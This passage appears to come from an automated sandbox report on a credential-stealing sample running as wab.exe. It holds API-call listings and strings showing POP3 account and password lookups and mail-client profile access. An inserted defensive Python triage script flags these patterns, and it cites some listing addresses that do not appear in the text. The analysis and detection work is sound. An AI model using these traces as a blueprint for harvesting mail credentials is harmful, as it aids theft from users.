                    • Opcode Fuzzy Hash: 0fe45435b174d2658ba89fd09b1042d7e1e67c87516d3cf5dfff1615dfc5111d
                    • Instruction Fuzzy Hash: F3310A7494125C9BCB21DF68C9887CDBBB9FF18314F1041DAE81CA7260EB349B818F49
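The per-function listings above are the raw material a triage script consumes. The Python below is an added example by the editor, not part of the Joe Sandbox report and not code from the analysed sample. It parses blocks in this page's `API.MODULE(stack slots), ref: address` format and applies three checks: the GetProcAddress, then VirtualProtect(?, 0x78, PAGE_READWRITE), then VirtualProtect(?, 0x78, ?) shape at 2136C804 to 2136C82A, which is how a resolved function is patched in place (the listing does not say which function; that block's string table is empty); the GetEnvironmentVariableW(ProgramFiles) plus FindFirstFileW/FindNextFileW walk with the Foxmail string at 21361434 to 213615B7, which is mail-client profile enumeration; and the IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter triple at 213661DA to 213661F1, which the execution graph labels ___scrt_fastfail and which is the MSVC CRT's fail-fast epilogue rather than a deliberate anti-debug check. The sample blocks are copied from this report; the check names, the MAIL_CLIENTS set and the reading of a `?` stack slot as "value not recovered" are the editor's assumptions.

```python
"""Triage helpers for Joe Sandbox style per-function API listings (added example by
the editor; not part of the report or the analysed sample). SAMPLE_* blocks are
copied from this report; the check names, MAIL_CLIENTS and the reading of a '?'
stack slot as "value not recovered" are the editor's assumptions."""
import re
from dataclasses import dataclass
from typing import List, Optional

# "<API>.<module>(<stack slots>), ref: <addr>", optionally prefixed with
# "Part of subcall function <addr>:". The sandbox prints the stack at call time,
# so the first N slots are the API's parameters and '?' is a value it could not read.
API_LINE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
STRING_LINE = re.compile(r"String ID:\s*(?P<ids>.*)$")  # '$'-separated string table
PAGE_READWRITE = 0x04
MAIL_CLIENTS = {"foxmail", "thunderbird", "outlook"}    # assumption: names worth flagging
CRT_FASTFAIL = ("IsDebuggerPresent", "SetUnhandledExceptionFilter",
                "UnhandledExceptionFilter")

@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: int
    subcall_of: Optional[int]   # callee address when the line was lifted from a subcall

def hexval(tok: str) -> Optional[int]:
    """Stack slot as int; None for '?' (not recovered by the sandbox)."""
    try:
        return int(tok, 16)
    except ValueError:
        return None

def parse_block(text: str):
    """One function block -> (calls in listing order, strings from its 'String ID')."""
    calls, strings = [], []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if m := API_LINE.search(line):
            raw_args = (m.group("args") or "").strip()
            args = [a.strip() for a in raw_args.split(",")] if raw_args else []
            sub = int(m.group("sub"), 16) if m.group("sub") else None
            calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
        elif s := STRING_LINE.match(line):
            strings.extend(x for x in s.group("ids").split("$") if x)
    return calls, strings

def find_inplace_patch(calls: List[Call]):
    """GetProcAddress, then VirtualProtect(addr, size, PAGE_READWRITE, &old) and a later
    VirtualProtect(addr, same size, old): a resolved function being patched in place.
    Which function is patched cannot be recovered from the listing alone."""
    findings, seen_gpa, rw = [], False, None
    for c in calls:
        if c.api == "GetProcAddress":
            seen_gpa = True
        elif c.api == "VirtualProtect" and len(c.args) >= 4:
            size, prot = hexval(c.args[1]), hexval(c.args[2])
            if rw is None and seen_gpa and prot == PAGE_READWRITE:
                rw = c
            elif rw is not None and size == hexval(rw.args[1]) and c.args[2] == "?":
                findings.append({"size": size, "unprotect": rw.ref, "restore": c.ref})
                rw = None
    return findings

def find_mail_client_enum(calls: List[Call], strings: List[str]):
    """GetEnvironmentVariableW("ProgramFiles") + a FindFirstFileW/FindNextFileW walk +
    a mail-client name among the block's strings: mail profile enumeration."""
    env = [c for c in calls if c.api == "GetEnvironmentVariableW"
           and c.args and c.args[0] == "ProgramFiles"]
    hits = [s for s in strings if s.lower() in MAIL_CLIENTS]
    if env and hits and {"FindFirstFileW", "FindNextFileW"} <= {c.api for c in calls}:
        return {"clients": hits, "env_ref": env[0].ref}
    return None

def is_crt_fastfail(calls: List[Call]) -> bool:
    """IsDebuggerPresent directly followed by SetUnhandledExceptionFilter and
    UnhandledExceptionFilter is the MSVC __scrt_fastfail epilogue, not a deliberate
    anti-debug check, so a block showing only this triple is CRT noise."""
    seq = [c.api for c in calls if c.subcall_of is None]
    return any(tuple(seq[i:i + 3]) == CRT_FASTFAIL for i in range(len(seq) - 2))

# Constructed test input: lines copied from the listings in this report.
SAMPLE_PATCH = """
• GetModuleHandleA.KERNEL32(2136C7DD), ref: 2136C7E6
• GetProcAddress.KERNEL32(00000000,00000000), ref: 2136C860
  • Part of subcall function 2136C803: GetProcAddress.KERNEL32(00000000,2136C7F4), ref: 2136C804
  • Part of subcall function 2136C803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,2136C7F4,2136C7DD), ref: 2136C816
  • Part of subcall function 2136C803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,2136C7F4,2136C7DD), ref: 2136C82A
"""
SAMPLE_MAIL = """
• GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 21361434
  • Part of subcall function 213610F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 21361193
  • Part of subcall function 213610F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 213611D0
• String ID: )$Foxmail$ProgramFiles
"""
SAMPLE_CRT = """
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 213661DA
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 213661E4
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 213661F1
"""

def triage(text: str) -> dict:
    """All three checks over one block."""
    calls, strings = parse_block(text)
    return {"patch": find_inplace_patch(calls),
            "mail_enum": find_mail_client_enum(calls, strings),
            "crt_fastfail": is_crt_fastfail(calls)}

if __name__ == "__main__":
    for name, blk in (("patch", SAMPLE_PATCH), ("mail", SAMPLE_MAIL), ("crt", SAMPLE_CRT)):
        print(name, triage(blk))
```

Paste any block's APIs list (and its String ID line) into a string and pass it to `triage`. On the VirtualProtect pair the reported size (0x78 here) is the number of bytes the patch covers, and the third argument of the restore call shows as `?` because it is the saved old protection read back from the stack, which is exactly what distinguishes a patch-and-restore from an ordinary one-off protection change.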
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?,21364A8A,?,21372238,0000000C,21364BBD,00000000,00000000,?,21362082,21372108,0000000C,21361F3A,?), ref: 21364AD5
                    • TerminateProcess.KERNEL32(00000000,?,21364A8A,?,21372238,0000000C,21364BBD,00000000,00000000,?,21362082,21372108,0000000C,21361F3A,?), ref: 21364ADC
                    • ExitProcess.KERNEL32 ref: 21364AEE
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: Process$CurrentExitTerminate
                    • String ID:
                    • API String ID: 1703294689-0
                    • Opcode ID: 3f8672f23fe803022ee4a55a10f9628701acfcf38f1d3990a9403b22b937f6cf
                    • Instruction ID: c7884dd59fb430c0c8687f0a3cb81fcaa5b02854e6ce3e8b824b3e4c9c8be142
                    • Opcode Fuzzy Hash: 3f8672f23fe803022ee4a55a10f9628701acfcf38f1d3990a9403b22b937f6cf
                    • Instruction Fuzzy Hash: ABE046368002C9AFDF026F29CD08A893F2FEF01395B004014FA858B029DB3AD952DB8C
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID:
                    • String ID: .
                    • API String ID: 0-248832578
                    • Opcode ID: 15bcca141526c1e6bdb8316b77091c70b1a6f996419890aec713f8045fedc015
                    • Instruction ID: b6a32f05e3d7200b909468a54a11b3701919f3b02eda6b4580bea1a54f69b48a
                    • Opcode Fuzzy Hash: 15bcca141526c1e6bdb8316b77091c70b1a6f996419890aec713f8045fedc015
                    • Instruction Fuzzy Hash: CD315CB1800189AFDB158F78CC84EEB7BBFDF86358F00019CE519D7159E6319E418B94
                    APIs
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: HeapProcess
                    • String ID:
                    • API String ID: 54951025-0
                    • Opcode ID: 885a3dfc040703da39fc67c1682062fa7deb00c1567c8c0b4cf02327c9ef896b
                    • Instruction ID: c37b87282d452d71f645d30a374c260552d9db9a972a33d23ca33bda02c15683
                    • Opcode Fuzzy Hash: 885a3dfc040703da39fc67c1682062fa7deb00c1567c8c0b4cf02327c9ef896b
                    • Instruction Fuzzy Hash: B6A011302802028F83028E32830A20E3AAEAA082C03000028A888C8020FB2880028B0A

                    Control-flow Graph

                    control_flow_graph 277 2136173a-213617fe call 2136c030 call 21362c40 * 2 284 21361803 call 21361cca 277->284 285 21361808-2136180c 284->285 286 21361812-21361816 285->286 287 213619ad-213619b1 285->287 286->287 288 2136181c-21361837 call 21361ede 286->288 291 2136199f-213619ac call 21361ee7 * 2 288->291 292 2136183d-21361845 288->292 291->287 293 21361982-21361985 292->293 294 2136184b-2136184e 292->294 297 21361987 293->297 298 21361995-21361999 293->298 294->293 299 21361854-21361881 call 213644b0 * 2 call 21361db7 294->299 301 2136198a-2136198d call 21362c40 297->301 298->291 298->292 311 21361887-2136189f call 213644b0 call 21361db7 299->311 312 2136193d-21361943 299->312 306 21361992 301->306 306->298 311->312 328 213618a5-213618a8 311->328 314 21361945-21361947 312->314 315 2136197e-21361980 312->315 314->315 317 21361949-2136194b 314->317 315->301 319 21361961-2136197c call 213616aa 317->319 320 2136194d-2136194f 317->320 319->306 321 21361955-21361957 320->321 322 21361951-21361953 320->322 325 2136195d-2136195f 321->325 326 21361959-2136195b 321->326 322->319 322->321 325->315 325->319 326->319 326->325 329 213618c4-213618dc call 213644b0 call 21361db7 328->329 330 213618aa-213618c2 call 213644b0 call 21361db7 328->330 329->298 339 213618e2-2136193b call 213616aa call 213615da call 21362c40 * 2 329->339 330->329 330->339 339->298
                    APIs
                      • Part of subcall function 21361CCA: CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D1B
                      • Part of subcall function 21361CCA: CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21361D37
                      • Part of subcall function 21361CCA: DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D4B
                    • _strlen.LIBCMT ref: 21361855
                    • _strlen.LIBCMT ref: 21361869
                    • _strlen.LIBCMT ref: 2136188B
                    • _strlen.LIBCMT ref: 213618AE
                    • _strlen.LIBCMT ref: 213618C8
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _strlen$File$CopyCreateDelete
                    • String ID: Acco$Acco$POP3$POP3$Pass$Pass$t$t$un$un$word$word
                    • API String ID: 3296212668-3023110444
                    • Opcode ID: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                    • Instruction ID: c02240d51e8d48544e1c596d1b8b41446de8fb6c395633f1806577e2042ab567
                    • Opcode Fuzzy Hash: 6f2763eb29f99e55b9fa1c4501e1124463a6139b8cfee53aa49ae728a3ea04e1
                    • Instruction Fuzzy Hash: 6A61FA71D00299AFEF118BA8C840BDEBBFFAF96318F00445AD5047725CDB745A45CB99

                    Control-flow Graph

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _strlen
                    • String ID: %m$~$Gon~$~F@7$~dra
                    • API String ID: 4218353326-230879103
                    • Opcode ID: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                    • Instruction ID: 100bb739b789fb89d0381a4ffb9af6fa576bc04440fdf43ba07af6b0782d2b25
                    • Opcode Fuzzy Hash: 5313ffee17f5d615fcbb67a61029f9413697531bcd3fb870ba25ca75e457194f
                    • Instruction Fuzzy Hash: 51716B71D002A95FDF129BB88C84ADF7BFEAF56318F10009AD644E3249E634D785CBA4
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 21367D06
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 213690D7
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 213690E9
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 213690FB
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 2136910D
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 2136911F
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 21369131
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 21369143
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 21369155
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 21369167
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 21369179
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 2136918B
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 2136919D
                      • Part of subcall function 213690BA: _free.LIBCMT ref: 213691AF
                    • _free.LIBCMT ref: 21367CFB
                      • Part of subcall function 2136571E: HeapFree.KERNEL32(00000000,00000000,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?), ref: 21365734
                      • Part of subcall function 2136571E: GetLastError.KERNEL32(?,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?,?), ref: 21365746
                    • _free.LIBCMT ref: 21367D1D
                    • _free.LIBCMT ref: 21367D32
                    • _free.LIBCMT ref: 21367D3D
                    • _free.LIBCMT ref: 21367D5F
                    • _free.LIBCMT ref: 21367D72
                    • _free.LIBCMT ref: 21367D80
                    • _free.LIBCMT ref: 21367D8B
                    • _free.LIBCMT ref: 21367DC3
                    • _free.LIBCMT ref: 21367DCA
                    • _free.LIBCMT ref: 21367DE7
                    • _free.LIBCMT ref: 21367DFF
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID:
                    • API String ID: 161543041-0
                    • Opcode ID: c6b65b79ece7574e9fa6ef23ad6e27f352a9243aaf91f814c5d1f59daa81b269
                    • Instruction ID: 58d5b971bbb5c4a043b715bba5020a37679d1ee40d08fe2666a9b8c589cddb50
                    • Opcode Fuzzy Hash: c6b65b79ece7574e9fa6ef23ad6e27f352a9243aaf91f814c5d1f59daa81b269
                    • Instruction Fuzzy Hash: 0F31833350028ADFEB219F38D840B66BBEFEF11358F644829E548D7559DE35E980CB18
                    APIs
                    • _free.LIBCMT ref: 213659EA
                      • Part of subcall function 2136571E: HeapFree.KERNEL32(00000000,00000000,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?), ref: 21365734
                      • Part of subcall function 2136571E: GetLastError.KERNEL32(?,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?,?), ref: 21365746
                    • _free.LIBCMT ref: 213659F6
                    • _free.LIBCMT ref: 21365A01
                    • _free.LIBCMT ref: 21365A0C
                    • _free.LIBCMT ref: 21365A17
                    • _free.LIBCMT ref: 21365A22
                    • _free.LIBCMT ref: 21365A2D
                    • _free.LIBCMT ref: 21365A38
                    • _free.LIBCMT ref: 21365A43
                    • _free.LIBCMT ref: 21365A51
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: db3df02e66f012a50d6f590d5ec75c9d6ec115f5d47787f9fd8296549ded96b3
                    • Instruction ID: b2b4d237df3c696a2876c09970494d49d2173e8d6bcc339dd2b658df7d908e33
                    • Opcode Fuzzy Hash: db3df02e66f012a50d6f590d5ec75c9d6ec115f5d47787f9fd8296549ded96b3
                    • Instruction Fuzzy Hash: 3D11B97A51018EFFCB21DF58C841CDD3FAAEF14394B0940A5BA088F529DA35DE509B84
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: DecodePointer
                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                    • API String ID: 3527080286-3064271455
                    • Opcode ID: 109b894d0beb068c350b6675e996f044b6f974cb9d5fa105310a36a6461f0b30
                    • Instruction ID: da27428bb4f333ea04d3aaed5d541f77a1b7dc60f868eaf6a1dd39f41206bf00
                    • Opcode Fuzzy Hash: 109b894d0beb068c350b6675e996f044b6f974cb9d5fa105310a36a6461f0b30
                    • Instruction Fuzzy Hash: 62517C7590058ECBDF009FA8E58459CBFBFFB0A218F104599D581AB25CCB758EA4CB1C
                    APIs
                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D1B
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 21361D37
                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D4B
                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D58
                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D72
                    • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D7D
                    • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 21361D8A
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: File$Delete$CloseCopyCreateHandleReadSize
                    • String ID:
                    • API String ID: 1454806937-0
                    • Opcode ID: f626b5fc2dc434b1fe55f7873eb5560b195b55d383c14da86c0f68bc3ba10887
                    • Instruction ID: f98e9cde2e2ecd6b0b0d3d4a860aa40a0e6a71c29849a9a209b31dd2ac1ecf46
                    • Opcode Fuzzy Hash: f626b5fc2dc434b1fe55f7873eb5560b195b55d383c14da86c0f68bc3ba10887
                    • Instruction Fuzzy Hash: 0A21C1B1D4125CBFDB11DBA18C8CEEB77BDEB58398F000865F501D2144D6748E418B78
                    APIs
                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,21369C07,?,00000000,?,00000000,00000000), ref: 213694D4
                    • __fassign.LIBCMT ref: 2136954F
                    • __fassign.LIBCMT ref: 2136956A
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,00000005,00000000,00000000), ref: 21369590
                    • WriteFile.KERNEL32(?,?,00000000,21369C07,00000000,?,?,?,?,?,?,?,?,?,21369C07,?), ref: 213695AF
                    • WriteFile.KERNEL32(?,?,?,21369C07,00000000,?,?,?,?,?,?,?,?,?,21369C07,?), ref: 213695E8
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID:
                    • API String ID: 1324828854-0
                    • Opcode ID: e63b9f23c40853ce3f5ad6a508b696a40bacd8507d5c94769e73a38907da15f1
                    • Instruction ID: d64c0d3d7630c4e66245b04c4c4deae231092f5cff334973680e6646124d9e7a
                    • Opcode Fuzzy Hash: e63b9f23c40853ce3f5ad6a508b696a40bacd8507d5c94769e73a38907da15f1
                    • Instruction Fuzzy Hash: F051E5B0D40289DFDB05CFA8C895AEEBBFEEF09324F10411AE551E7295E7709941CB64
                    APIs
                    • _ValidateLocalCookies.LIBCMT ref: 2136339B
                    • ___except_validate_context_record.LIBVCRUNTIME ref: 213633A3
                    • _ValidateLocalCookies.LIBCMT ref: 21363431
                    • __IsNonwritableInCurrentImage.LIBCMT ref: 2136345C
                    • _ValidateLocalCookies.LIBCMT ref: 213634B1
                    Strings
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                    • String ID: csm
                    • API String ID: 1170836740-1018135373
                    • Opcode ID: 73945e31004e20ba085e56065fd9cbaba2ac1fe5fb8d1da333dc1c73889e44bd
                    • Instruction ID: 3032aee4f778a6433855992e6d906f8d76c14166112a2ff27fc6acf1c44c1351
                    • Opcode Fuzzy Hash: 73945e31004e20ba085e56065fd9cbaba2ac1fe5fb8d1da333dc1c73889e44bd
                    • Instruction Fuzzy Hash: 3041D838A002899FDB02CF69C840A9FBFBFAF4532CF148159D9296B359D735DA01CB95
                    APIs
                      • Part of subcall function 21369221: _free.LIBCMT ref: 2136924A
                    • _free.LIBCMT ref: 213692AB
                      • Part of subcall function 2136571E: HeapFree.KERNEL32(00000000,00000000,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?), ref: 21365734
                      • Part of subcall function 2136571E: GetLastError.KERNEL32(?,?,2136924F,?,00000000,?,00000000,?,21369276,?,00000007,?,?,21367E5A,?,?), ref: 21365746
                    • _free.LIBCMT ref: 213692B6
                    • _free.LIBCMT ref: 213692C1
                    • _free.LIBCMT ref: 21369315
                    • _free.LIBCMT ref: 21369320
                    • _free.LIBCMT ref: 2136932B
                    • _free.LIBCMT ref: 21369336
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                    • Instruction ID: f720fd1306f584946bc7e40b9b5984d1a2d5266f12889cad969cb748d1e82b33
                    • Opcode Fuzzy Hash: 1a15e4038a9c55df62fbd1c49a93c652c8e4a7ee207dd1f8de08331087c78b01
                    • Instruction Fuzzy Hash: BB11AF32540B8EEED630ABB4CC45FCB7B9E9F14308F400824A6997A056DA3AB4404749
                    APIs
                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,21366FFD,00000000,?,?,?,21368A72,?,?,00000100), ref: 2136887B
                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,?,?,?,?,21368A72,?,?,00000100,5EFC4D8B,?,?), ref: 21368901
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 213689FB
                    • __freea.LIBCMT ref: 21368A08
                      • Part of subcall function 213656D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 21365702
                    • __freea.LIBCMT ref: 21368A11
                    • __freea.LIBCMT ref: 21368A36
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: ByteCharMultiWide__freea$AllocateHeap
                    • String ID:
                    • API String ID: 1414292761-0
                    • Opcode ID: ccef8bcfed86857d67e7f1aa3ba5ede26f43a790db4f5a3108b470d5df786a16
                    • Instruction ID: f411682e85cf3abce422834a5113afc2df84cd7793fa3335a78492b5f9189143
                    • Opcode Fuzzy Hash: ccef8bcfed86857d67e7f1aa3ba5ede26f43a790db4f5a3108b470d5df786a16
                    • Instruction Fuzzy Hash: 2051D072610386AFEB158E64CC40EAF3BAFEB4975CF1006B8ED04D6148EB35DC508B99
                    APIs
                    • _strlen.LIBCMT ref: 21361607
                    • _strcat.LIBCMT ref: 2136161D
                    • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,2136190E,?,?,00000000,?,00000000), ref: 21361643
                    • lstrcatW.KERNEL32(?,?), ref: 2136165A
                    • lstrlenW.KERNEL32(?,?,?,?,?,2136190E,?,?,00000000,?,00000000,?,?,?,00000104,?), ref: 21361661
                    • lstrcatW.KERNEL32(00001008,?), ref: 21361686
                    Memory Dump Source
                    • Source File: 0000000A.00000002.3384985491.0000000021361000.00000040.00001000.00020000.00000000.sdmp, Offset: 21360000, based on PE: true
                    • Associated: 0000000A.00000002.3384969196.0000000021360000.00000004.00001000.00020000.00000000.sdmp
                    • Associated: 0000000A.00000002.3384985491.0000000021376000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_10_2_21360000_wab.jbxd
                    Similarity
                    • API ID: lstrcatlstrlen$_strcat_strlen
                    • String ID:
                    • API String ID: 1922816806-0
                    • Opcode ID: 854d8f4993d68dd89ade6952b075e10418996f001d0f3cadca8acfb40b827bee
                    • Instruction ID: 9a4b3f0249b2c85deaabc2db5c879d2d7f45ab92c24f9dd0f803c3c61d6fbf30
                    • Opcode Fuzzy Hash: 854d8f4993d68dd89ade6952b075e10418996f001d0f3cadca8acfb40b827bee
                    • Instruction Fuzzy Hash: 7E21F836D00245AFCB019F69EC81EEE77BEEF88724F14441AE904AB148DB34A94187AD
                    APIs
